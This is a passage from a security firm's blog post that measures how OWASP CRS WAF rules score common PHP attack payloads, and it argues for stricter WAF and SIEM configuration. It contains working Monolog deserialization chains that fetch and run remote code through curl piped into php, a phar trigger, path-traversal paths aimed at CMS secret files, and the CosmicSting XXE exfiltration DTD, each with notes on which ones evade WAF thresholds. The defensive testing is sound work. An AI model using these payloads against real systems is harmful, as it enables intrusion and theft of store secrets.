curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=Monolog%5CHandler%5CBufferHandler%22%3A7%3A%7BS%3A7%3A%22handler%22%3Br%3A2%3BS%3A10%3A%22bufferSize%22%3Bi%3A-1%3BS%3A6%3A%22buffer%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BS%3A71%3A%22curl%208.8.8.8%2Fpayload.php%20%7C%20php%22%3BS%3A5%3A%22level%22%3BN%3B%7D%7DS%3A5%3A%22level%22%3BN%3BS%3A11%3A%22initialized%22%3Bb%3A1%3BS%3A11%3A%22bufferLimit%22%3Bi%3A-1%3BS%3A10%3A%22processors%22%3Ba%3A2%3A%7Bi%3A0%3BS%3A7%3A%22current%22%3Bi%3A1%3BS%3A4%3A%22exec%22%3B%7D%7D%7D"
There is no result, which means the sequence is not blocked at all.
Let's test it at Paranoia Level 2 :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=Monolog%5CHandler%5CBufferHandler%22%3A7%3A%7BS%3A7%3A%22handler%22%3Br%3A2%3BS%3A10%3A%22bufferSize%22%3Bi%3A-1%3BS%3A6%3A%22buffer%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BS%3A71%3A%22curl%208.8.8.8%2Fpayload.php%20%7C%20php%22%3BS%3A5%3A%22level%22%3BN%3B%7D%7DS%3A5%3A%22level%22%3BN%3BS%3A11%3A%22initialized%22%3Bb%3A1%3BS%3A11%3A%22bufferLimit%22%3Bi%3A-1%3BS%3A10%3A%22processors%22%3Ba%3A2%3A%7Bi%3A0%3BS%3A7%3A%22current%22%3Bi%3A1%3BS%3A4%3A%22exec%22%3B%7D%7D%7D"
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
932240 PL2 Remote Command Execution: Unix Command Injection evasion attempt detected
942180 PL? Detects basic SQL authentication bypass attempts 1/3
942430 PL? Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 23)
Please note the payload score, which comes to 23 points, corresponding to the triggering of four critical rules. However, be careful: rule 932200 was triggered. As mentioned earlier, we therefore need to subtract its score, which gives an adjusted score of 23 − 10 = 13 points.
If your WAF does not block payloads with a score above 10, this payload will get through without difficulty.
The more observant among you will have noticed that it isn't entirely fair to insist on the CWE-502 angle with this payload. It is in fact specific to an internal Magento mechanism, exploiting the upload of a file without an extension, which greatly limits its applicability in other contexts.
Let's now take a payload that is compatible with the entire PHP ecosystem - you can generate as many as you want using the PHPGGC project (https://github.com/ambionics/phpggc), as Monolog isn't the only library affected:
O:37:"Monolog\Handler\FingersCrossedHandler":3:{s:13:"passthruLevel";i:0;s:6:"buffer";a:1:{s:4:"test";a:2:{i:0;s:45:"curl 8.8.8.8/payload.php | php";s:5:"level";N;}}s:7:"handler";O:29:"Monolog\Handler\BufferHandler":7:{s:7:"handler";N;s:10:"bufferSize";i:-1;s:6:"buffer";N;s:5:"level";N;s:11:"initialized";b:1;s:11:"bufferLimit";i:-1;s:10:"processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}
Let's test it at Paranoia Level 1 :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=O%3A37%3A%22Monolog%5CHandler%5CFingersCrossedHandler%22%3A3%3A%7Bs%3A13%3A%22passthruLevel%22%3Bi%3A0%3Bs%3A6%3A%22buffer%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A45%3A%22curl%208.8.8.8%2Fpayload.php%20%7C%20php%22%3Bs%3A5%3A%22level%22%3BN%3B%7D%7Ds%3A7%3A%22handler%22%3BO%3A29%3A%22Monolog%5CHandler%5CBufferHandler%22%3A7%3A%7Bs%3A7%3A%22handler%22%3BN%3Bs%3A10%3A%22bufferSize%22%3Bi%3A-1%3Bs%3A6%3A%22buffer%22%3BN%3Bs%3A5%3A%22level%22%3BN%3Bs%3A11%3A%22initialized%22%3Bb%3A1%3Bs%3A11%3A%22bufferLimit%22%3Bi%3A-1%3Bs%3A10%3A%22processors%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22current%22%3Bi%3A1%3Bs%3A6%3A%22system%22%3B%7D%7D%7D"
933170 PL1 PHP Injection Attack: Serialized Object Injection
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 5)
Please note the payload score : 5, which corresponds to the triggering of a single critical rule. In other words : if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 5, this payload will get through without difficulty.
Let's test it at Paranoia Level 2 :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=O%3A37%3A%22Monolog%5CHandler%5CFingersCrossedHandler%22%3A3%3A%7Bs%3A13%3A%22passthruLevel%22%3Bi%3A0%3Bs%3A6%3A%22buffer%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A45%3A%22curl%208.8.8.8%2Fpayload.php%20%7C%20php%22%3Bs%3A5%3A%22level%22%3BN%3B%7D%7Ds%3A7%3A%22handler%22%3BO%3A29%3A%22Monolog%5CHandler%5CBufferHandler%22%3A7%3A%7Bs%3A7%3A%22handler%22%3BN%3Bs%3A10%3A%22bufferSize%22%3Bi%3A-1%3Bs%3A6%3A%22buffer%22%3BN%3Bs%3A5%3A%22level%22%3BN%3Bs%3A11%3A%22initialized%22%3Bb%3A1%3Bs%3A11%3A%22bufferLimit%22%3Bi%3A-1%3Bs%3A10%3A%22processors%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22current%22%3Bi%3A1%3Bs%3A6%3A%22system%22%3B%7D%7D%7D"
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
932240 PL2 Remote Command Execution: Unix Command Injection evasion attempt detected
933170 PL1 PHP Injection Attack: Serialized Object Injection
942180 PL? Detects basic SQL authentication bypass attempts 1/3
942430 PL? Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 28)
Please note the payload score: 28, corresponding to the triggering of five critical rules. However, be careful: rule 932200 was triggered twice, so we need to subtract that score. The adjusted score is therefore 28 minus the 10 points associated with rule 932200, so 18 points.
If your WAF does not block payloads with a score above 15, this payload will get through without difficulty.
Whenever you encounter a call to unserialize() in PHP code, you can assume that if it isn't used with the ['allowed_classes' => false] option, it is very often a critical vulnerability. This type of weakness directly exposes the application to PHP Object Injection scenarios, with potentially major impacts (code execution, privilege escalation, full application compromise). In this context, the severity is at its maximum, with a CVSS 4.0 score of 10/10. Despite years of feedback and documented incidents, this pattern is still very widespread across the PHP ecosystem. Additional hardening mechanisms have been introduced with PHP 8.4, and one can reasonably hope for even stricter changes with PHP 9, given how high the structural risk associated with unserialize() is.
2.4.3/ Dangerous deserialization via phar.
The PHP core has been protected against this type of bypass since PHP 8.
In practice - and assuming you are using the recommended PHP versions - only the following are affected:
- Dolibarr version 13 and below
- Magento version 2.4.3 and below
- PrestaShop version 1.7 and below
- Wordpress version 5.5 and below
These attacks are always two-phased :
Phase 1 – Payload deposit.
First, the attacker must upload a file to the system, to a path that is exposed by the online store.
This could be, for example, an image that actually contains a PHAR-type offensive payload, disguised behind a perfectly legitimate file extension.
Phase 2 – Triggering the payload.
Second, it only takes a filesystem-accessing function accepting an unprefixed variable.
This behavior very often amounts to a Path Traversal or SSRF vulnerability, for example :
is_file($_GET['test']);
For those wondering what is meant by an “unprefixed variable,” here is an example of a prefixed variable : is_file(ROOT_DIR . $_GET['test']); This call cannot be hijacked using a scheme such as phar://
At the risk of stating the obvious: WAFs are not anti-malware solutions by nature. They can try to approximate that, but it isn't their primary purpose.
As a result, OWASP CRS does not natively filter the upload of files whose extension is not considered directly dangerous to the system - that is, for example, anything other than a .php.
Without specific tuning, it's therefore unrealistic to expect to intercept these seemingly harmless files without analyzing their contents.
On the other hand, it is entirely possible to prevent their activation during the second phase of the attack. Here is the triggering payload:
?cnmq=phar://my_predictable_path/cnmq.jpg
Let's test it at Paranoia Level 1 :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=phar%3A%2F%2Fmy_predictable_path%2Fcnmq.jpg"
933200 PL1 PHP Injection Attack: Wrapper scheme detected
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 5)
Please note the payload score: 5, which corresponds to the triggering of a single critical rule. In other words : if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 5, this payload will get through without difficulty.
Let's test it at Paranoia Level 2 :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=phar%3A%2F%2Fmy_predictable_path%2Fcnmq.jpg"
931130 PL2 Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link
933200 PL1 PHP Injection Attack: Wrapper scheme detected
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 10)
Please note the payload score: 10, which corresponds to the triggering of two critical rules. In other words: if your WAF, configured at PL2 (paranoia level 2), does not block scores greater than or equal to 10, this payload will get through without difficulty.
This CWE-502 variant is particularly frustrating for auditors. It is, in fact, one of the most dangerous historical attack vectors in the PHP ecosystem and, paradoxically, it is almost impossible to publish security advisories about it in the form of CVEs.
Why? Because if :
- The likelihood that a system allows file uploads to a predictable path is high,
- and the presence of filesystem access functions (is_file(), file_exists(), getimagesize(), etc.) exposed with unprefixed variables is just as common,
The likelihood that this chain exists on a PrestaShop site is high, but the likelihood that both weaknesses coexist within the same component (module or plugin) is low. This dependency between two distinct conditions mechanically prevents the publication of a CVE, which requires a reproducible and clearly delimited scope.
The conclusion from these demonstrations within the scope of RCE is : if your WAF provider
- operates at PL1 (paranoia level 1) and does not block anything above a 5-point score - some “rare” payloads even pass through PL1 completely
- operates at PL2 (paranoia level 2) and does not block anything above a 10-point score
You have no preventive protection against the common RCE vectors in the PHP ecosystem.
If your developer tells you that you've suffered an RCE, shut down your site immediately and contact an incident response/remediation company.
There is no point in deploying a WAF after a compromise of this kind until the remediation phase has been completed.. You don't stop a hemorrhage with body armor. Payloads have already been planted in your system - either with immediate triggering (filesystem) or delayed triggering (database, notably via stored XSS).
These payloads are specifically designed to bypass defense protocols, often by adding an encryption layer (for example, RSA), which makes subsequent payloads unreadable to a WAF.
2.5/ Data theft : path traversal - CWE-22
When the goal is to steal all the secrets from an online store in order to abuse advanced features - such as exporting customer files - configuration files are always targeted. Each business ecosystem has its own payloads for this class of vulnerability.
- PrestaShop 1.6 and below : ?cnmq=../config/settings.inc.php
- PrestaShop 1.7 and below : ?cnmq=../app/config/parameters.php
- Magento 2 : ?cnmq=../app/etc/env.php
- Symfony : ?cnmq=../.env.prod.local or more generally : .env(\.[a-z]+)?\.local
Based on OWASP CRS version 4.20.0, let's look at the score of these payloads :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d 'cnmq=..%2Fapp%2Fconfig%2Fparameters.php'
930110 PL1 Path Traversal Attack (/../) or (/.../)
930110 PL1 Path Traversal Attack (/../) or (/.../)
930120 PL1 OS File Access Attempt
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 15)
Rule 930120 is only triggered on recent versions of OWASP CRS, and most WAFs won't be updated for years. We therefore assume that the effective payload score will be 10 points, not 15 points.
In other words : if your WAF, configured at PL2 (paranoia level 2), does not block scores greater than or equal to 10, this payload will get through without difficulty.
The conclusion from this demonstration on the scope of data leaks via the path traversal variant is : if your WAF provider
- operates at PL1 (paranoia level 1) and does not block anything above a 10-point score
You have no preventive protection against data leaks via Path Traversal
2.6/ Data theft : XXE - CWE-611
Everyone will remember CosmicSting, the notoriously infamous Magento XXE published in the summer of 2024, which - via a call in the checkout flow - made it possible to automatically exfiltrate all files from targeted Magento stores to an attacker-controlled server, including all of their secrets.
Other solutions were also affected by this abuse of the XML engine, and others will certainly follow - until data flows migrate to JSON, which does not (yet) suffer from implicit behaviors with potentially harmful consequences when they aren't properly controlled.
Just like PHAR-based CWE-502 variants, XXE attacks are also two-phased - although for this class of vulnerabilities, the targeted online store will often only see the second phase: the actual attack phase.
Phase 1 – Deploying the offensive payload on public hosting that is accessible by the targeted online store.
First, the attacker must deploy a file on the Internet - one that must be reachable by the targeted online store.
This is the control payload that defines how to exfiltrate data from the targeted site.
For the CosmicSting example, here is the content of the file https://A.B/payload.md :
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=../app/etc/env.php">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'https://A.B/exfiltration-CVE-2024-34102.php?%data;'>">
Since this payload is hosted on a remote service, it falls outside the scope of the WAF deployed on the online store.
Phase 2 – Triggering the payload.
Second, you need to send the triggering payload to a misconfigured XML parser exposed on the targeted online store. In the CosmicSting case, the payload would look like this:
{"address": {"totalsCollector": {"collectorList": {"totalCollector": {"sourceData": {"data": "<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"https://A.B/payload.md\"> %sp; %param1; ]> <r>&exfil;</r>", "options": 16}}}}}}
Please note that in the case of CosmicSting, this is an XXE embedded within a JSON format.
Let's look at OWASP CRS at PL1 :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -H 'content-type:application/json' -d '{"address": {"totalsCollector": {"collectorList": {"totalCollector": {"sourceData": {"data": "<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"https://A.B/payload.md\"> %sp; %param1; ]> <r>&exfil;</r>", "options": 16}}}}}}'
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 10)
Please note the payload score: 10, corresponding to the triggering of a single critical rule. In other words: if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 10, this payload will get through without difficulty.
Let's look at PL2 (Paranoia Level 2) :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -H 'content-type:application/json' -d '{"address": {"totalsCollector": {"collectorList": {"totalCollector": {"sourceData": {"data": "<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"https://A.B/payload.md\"> %sp; %param1; ]> <r>&exfil;</r>", "options": 16}}}}}}'
931130 PL2 Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942520 PL2 Detects basic SQL authentication bypass attempts 4.0/4
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 33)
Please note the payload score, which comes to 33 points, corresponding to the triggering of six critical rules. However, be careful: rule 932200 was triggered. As mentioned earlier, we therefore need to subtract its score, which gives an adjusted score of 33 − 10 = 23 points.
There is, however, a small “secret” about payloads submitted with a JSON Content-Type: it assumes that the WAF's JSON processor is enabled - which is often not the case, especially if the service isn't managed by a professional WAF integrator. If the processor isn't enabled, and there is no URLENCODED processor as a fallback, this payload could be completely invisible to the WAF.
Those of you with a sharp eye will have understood, however, that it is - once again - not intellectually honest to test this payload purely from the XXE angle, since it is specific to a Magento-specific operating mode.
Let's turn it into a conventional XXE payload with a properly declared XML Content-Type:
<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "https://A.B/payload.md"> %sp; %param1; ]> <r>&exfil;</r>
Let's look at the score, directly on PL2 :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:4" "http://sandbox.coreruleset.org/" -H 'content-type:application/xml' -d '<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "https://A.B/payload.md"> %sp; %param1; ]> <r>&exfil;</r>'
The CRS Sandbox returns no result - which doesn't mean it wasn't blocked. In fact, this XML input is considered corrupted on hardened systems : the definition of the exfil variable depends on loading the file https://A.B/payload.md. If that file isn't loaded - which is the desired behavior - then an error is generated.
This brings us to another “secret”: the WAF's XML processor is enabled even less often than the JSON processor, often because of third-party services that exchange data without any integrity control on their traffic - we won't name names, but we certainly have a few things to say about certain logistics or marketing companies on that front.
The consequence of not enabling the XML processor is that this payload will be invisible to many WAFs.
We remind WAF integrators that enabling the JSON and XML processors is an obligation and that if you neglect this, you are effectively hiding an entire part of application security that goes far beyond XXE - the vast majority of rules are effectively neutralized (SQL injection / XSS / etc.).
APIs that communicate in XML/JSON - as well as Ajax calls (XHR requests) in JSON - are everywhere in our environments, and this trend is accelerating with headless architectures and the widespread adoption of JSON-based REST APIs.
The implicit behaviors of XML processing engines have caused a lot of damage over the past two years. We encourage you to place these flows behind strict IP allowlisting to reduce the exposure of your XML parsers. This will help reduce your attack surface against unlikely future XML-related 0-days.
The conclusion from this demonstration within the scope of data leaks via the XXE variant is : if your WAF provider
- has not enabled the XML and JSON processors, so it cannot analyze payloads carried in XML and JSON flows
- operates at PL1 (paranoia level 1) while not blocking anything above a 10-point score
- operates at PL2 (paranoia level 2) while not blocking anything above a 20-point score
You have no preventive protection against data leaks via XXE
The vulnerability classes that should be tested as part of a preventive approach aligned with OWASP recommendations are numerous, and covering them exhaustively is beyond the scope of this article.
Please note that we also cannot cover Content-Type evasion attacks, which aim to slip under the radar of the WAF's processing engines.
We therefore encourage you to get in touch with us to discover our
PrestaShop WAF diagnostic tool : it's free.
Our diagnostic tool runs over 6,000 highly heterogeneous attack patterns, enabling you to identify and then fix gaps in your defensive posture - the ones that form (or weaken) the barrier that is supposed to protect you from application-layer threats.
A complete, detailed report will be published here soon - we're currently in discussions with the OWASP CRS core team to finalize it.
3. What about OWASP CRS updates ?
The sharpest among you will have noticed that, across all the payloads we tested, we deliberately omitted specifying the version of the OWASP CRS WAF being used.
This means that all the scores shown were calculated using the latest version of the OWASP CRS rules - 4.21.0, which is currently the most complete and mature release.
We're getting to another
little WAF secret: they need to be kept up to date regularly, and very few players do so with the necessary rigor.
Earlier versions of OWASP CRS have proven to be real “Swiss cheese” for certain vulnerability classes or for specific business ecosystems - PrestaShop included.
As a result, the scores produced by our test payloads are often much higher than what is observed in real-world conditions, whenever the WAF in place relies on outdated rules - sometimes several years old.
If you use Cloudflare's WAF to protect a PrestaShop site, it is possible to
see this obsolescence very quickly.
On your homepage, simply add the following parameter :
?cnmq=/app/config/parameters.php
As long as Cloudflare's WAF does not block this request, it means the rules are still not aligned with the state of the CRS as of
November 2, 2025, corresponding to OWASP CRS version
4.20.0.
4. The “little secrets” of WAFs like Cloudflare: for less than €2,400 excl. VAT per year, they don't do much - sometimes nothing at all.
First of all, it's important to reiterate a point that's often overlooked: only Cloudflare's €240 excl. VAT per year plan includes a WAF.
Cloudflare's free plan simply does not include any WAF.
That being said, this so-called “entry-level” plan has a structural limitation that is generally known only to specialists :
it's impossible to configure a blocking threshold below 25 points.
In other words, based on the examples presented earlier, Cloudflare - like any OWASP CRS–based WAF that doesn't enforce PL2 at a 10-point threshold - becomes ineffective against professional attackers who master WAF fooling techniques. Low-fingerprint offensive payloads will then get through without difficulty.
Cloudflare's Enterprise plan, offered from €2,400 excl. VAT per year, is the only one that provides capabilities truly compatible with OWASP recommendations.
Nevertheless - as is often the case -
the devil is in the details.
This plan is by no means a turnkey solution:
the configuration remains entirely the customer's responsibility.
Our demonstrations have shown it:
- Paranoia Level 2 is a bare minimum for any professional-grade approach,
- as does setting a blocking threshold of 10 points max, which is essential to achieve truly coherent defensive coverage,
- the full enablement of all processing engines, including the JSON and XML processors,
- and the need to continuously keep the OWASP CRS rules up to date
Without these settings, having a WAF is more a security illusion than effective protection.
At a professional level,
tuning the WAF rules and monitoring them through a SIEM represents several thousand hours of work, most of which cannot be pooled or reused across environments.
Based on our feedback, more than 65% of this effort cannot be shared or reused, since it is project-specific due to custom development - a major selling point of open-source solutions, but one that has serious consequences when it comes to deploying truly professional cyber-defense mechanisms.
For the skeptics who refuse to face this reality - and who will no doubt reply that Cloudflare's IPS is one of the best in the world and that, as such, WAF gaps are compensated by filtering IP addresses identified as malicious - let's remember of one essential thing:
IPS solutions have a “little secret” too.
They will never reliably block IP addresses coming from “white zones,” i.e., IPs assigned by mass-market telecom operators (residential ISP ranges). Yet today, the bulk of attacks carried out by professional criminal networks against applications comes precisely from these zones.
We can thank, among other things, unregulated connected devices (IoT) and services like IPBurger, which make it possible to rent residential IP addresses that look perfectly legitimate from an IPS standpoint.
5. A WAF without a SIEM = guaranteed damage to your revenue.
A WAF can be compared to long-range artillery, capable of striking within a 200 km radius. Used poorly, it can turn against you and cause collateral damage by impacting allies, due to a lack of sufficient observability.
However, artillery never operates without a radar station and/or a satellite network. The logic is exactly the same for a WAF: it cannot be run at a professional level without a SIEM (Security Information and Event Management), capable of informing you in real time about blocks - whether they are intended or not.
Based on our field experience, the time allocated to the WAF and the SIEM that accompanies it is generally split along a one-third / two-thirds ratio.
Concretely, out of three hours allocated to tuning/enabling a security rule:
- one hour is devoted to the WAF
- two hours to the SIEM to handle the alerts
Before you start tuning OWASP CRS rules on your WAF-such as Cloudflare Enterprise -
make sure your SIEM is properly bedded in and operational: you're going to need it.
6. DDoS attacks are the least of your worries.
A DDoS attack rarely exposes you to liability, since by nature its goal is not to compromise your service, but merely to make it unavailable - most often temporarily - with very rare exceptions.
It can cause immediate financial losses, but it rarely leads to long-term damage - those are most often tied to reputational loss.
While there's no question that Cloudflare is certainly one of the best anti-DDoS providers in the world in terms of capability, please keep in mind that this threat should be the least of your worries in 2026.
The French ecosystem has been heavily impacted for more than two years by massive compromises, as regularly highlighted by
Bonjour la fuite.
The reasons varies. Beyond retaliatory actions carried out by pro-Russian groups in response to France's active support for Ukraine, it should also be noted that teenagers - boosted by libertarian AIs - have been implicated for more than a year in large-scale compromises.
While AI is undeniably a technological revolution, it also comes with a set of structural challenges that are particularly complex to manage in the short term. Among them: unregulated AIs - true roaming improvised bombs - now accessible to children whose sense of ethics and morality is not yet fully formed.
7. The questions to ask when buying a WAF.
When you require a WAF and you don't want it to be purely decorative, here are the essential questions to ask:
- What technology is it based on ? Is it OWASP CRS, like Cloudflare ?
- If so, what paranoia level is configured ? And what is the minimum blocking score ?
- Who manages the CRS rule updates, and under what process ?
- Which SIEM is deployed to analyze blocks in order to avoid negative impacts on revenue ? What are its limitations ?
- How are unwanted blockings (false positives) identified by the SIEM analyzed, qualified, and fixed ? Under what criteria are bypass/unblocking rules defined and applied ?
- Which professional penetration-testing companies (such as Qualys with Qualys WAS) regularly test your defensive setup ?
- Which company audits and assesses the WAF's real-world effectiveness (for example, the TouchWeb WAF diagnostic tool) ?
When all of these points are handled seriously, you have
strong indicators that the provider in charge of integrating and operating your WAF is acting professionally. Otherwise, heightened vigilance is required - less you risk deploying an ineffective setup.
That doesn't mean you'll never be compromised - every cybersecurity mechanism is imperfect by nature - but you do maximize your risk reduction.
8. Conclusion: your security protocols must evolve in proportion to the threat
If we assume the average order value is €68 (source :
Fevad) and the observed average price of a stolen French bank card is €10. (source :
01net)
Here is an overview of your risks based on your revenue :
| E-commerce profile. |
PCI-DSS / Risk |
Annual revenue |
Orders / day |
Compromised payment cards |
Estimated value for criminals |
|
Detection < 48 h |
Detection < 14 days |
Detection < 48 h |
Detection < 14 days |
| Micro-business (very small business) |
4 - Low |
100K € |
4 orders / day |
8 stolen cards |
56 stolen cards |
80€ |
560€ |
| Small business (lower tier) |
4 - Moderate |
500K € |
20 orders / day |
40 stolen cards |
280 stolen cards |
400€ |
2 800€ |
| Small business (higher tier) |
4 - High |
1M € |
40 orders / day |
80 stolen cards |
560 stolen cards |
800€ |
5 600€ |
| SME / small enterprise (lower tier) |
3 - Very high |
2M € |
80 orders / day |
160 stolen cards |
1 120 stolen cards |
1 600€ |
11 200€ |
| SME / small enterprise (upper tier) |
3 - Critical |
10M € |
400 orders / day |
800 stolen cards |
5 600 stolen cards |
8 000€ |
56 000€ |
| SME / mid-sized enterprise (lower tier) |
3 - Critical |
20M € |
800 orders / day |
1 600 stolen cards |
11 200 stolen cards |
16 000€ |
112 000€ |
| SME / mid-sized enterprise (upper tier) |
3 - Critical |
50M € |
2 000 orders / day |
4 000 stolen cards |
28 000 stolen cards |
40 000€ |
280 000€ |
Risk assessment must take daily transaction volume into account. An e-commerce site generating €1M in annual revenue with an average basket of €5 (goodies) can be exposed to a critical risk rather than a high one. Conversely, a site generating €50M in annual revenue with an average basket of €2,500 (jewelry) may present a high risk level rather than a critical one.
In 2026, all e-commerce businesses generating more than €1M in annual revenue face a high risk, and SMEs are now considered exposed to a very high to critical risk.
Cybersecurity is neither a product nor an optional add-on, let alone a marketing argument to switch on after an incident.
It's a demanding discipline - time-consuming, expensive, and fundamentally incompatible with a mindset of permanent compromise and “lowest-bidder” trade-offs.
A poorly configured WAF, with no observability (SIEM) and no expertise, protects nothing.
It reassures, it looks good, but it doesn't stop adversaries who work methodically, iteratively, and without budget constraints.
The compromises we're seeing today are not a technological inevitability.
They are the direct consequence of human choices: underinvestment, blind delegation, and a refusal to accept that security comes with an irreducible cost.
In cybersecurity as everywhere else, reality always catches up in the end.
And when it does, the bill is invariably higher than the upfront investment that would have prevented it.
If your managed services contract (excluding hosting) costs you less than €6,000 excl. VAT per year, you are almost certainly exposed.
At that budget level, it's unrealistic to expect professional monitoring, proactive security management, or any real response capability with a proactive SIEM.
In an increasingly hostile environment,
only companies able to adapt today will preserve their ability to exist tomorrow.
Without cybersecurity, an incident is not a risk but an inevitable deadline.